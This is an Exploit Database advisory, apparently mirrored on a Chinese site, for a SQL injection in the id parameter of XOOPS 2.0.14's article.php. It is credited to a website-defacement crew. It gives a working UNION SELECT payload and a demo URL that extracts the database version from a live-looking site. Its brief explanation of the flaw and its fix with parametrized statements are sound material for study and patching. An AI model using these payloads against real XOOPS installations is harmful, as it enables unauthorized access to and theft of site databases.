XOOPS 2.0.14 – ‘article.php’ SQL Injection

• Exploit Database
• 119 阅读

• 作者： []0iZy5
  日期： 2010-08-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14828/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  ################################################################## ################################################################## #___ ____ _______ _# # / _ \ / _ \| | |__ \/ _| | | # #_ __| | | | | | | |_| || | ___| |_ __ ____ _____| | # # | &apos;__| | | | | | | __| || |/ _ \_/ _<code> |/ __/ _ \/ _</code> | # # | || |_| | |_| | |_| |__| |__/ || (_| | (_|__/ (_| | # # |_| \___/ \___/ \__|_____/ \___|_| \__,_|\___\___|\__,_| # ## ## # +-+-+-+-+# # |C|r|e|w|# # +-+-+-+-+# ################################################################## ################################################################## # [#] XOOPS 2.0.14 (article.php) SQL Injection Vulnerability # # [#] Discovered By []0iZy5# # [#] http://r00tDefaced.com & uNkn0wn.eu(is back) # # [#] Greetz: Gn0515, Silic0n, my bb(denys) & r00tDefaced Members# ################################################################## # # [2]-SQL injection # # Vulnerability Description: # SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an #application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby unexpectedly executed. # # Affected items: #http://127.0.0.1/path/modules/articles/article.php?id=[SQL Injection] # # Example: -1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- [You can find the number of vulnerable query] # Demo: http://www.site.com/modules/articles/article.php?id=1%20union%20all%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- # # The Risk: # By exploiting this vulnerability, an attacker can inject malicious code in the script and can have access to the database. # # Fix the vulnerability: # To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parametrized statements must be used #(preferred), or user input must be carefully escaped or filtered. # ################################################################# ################################################################# # r00tDefaced.com [28/08/2010]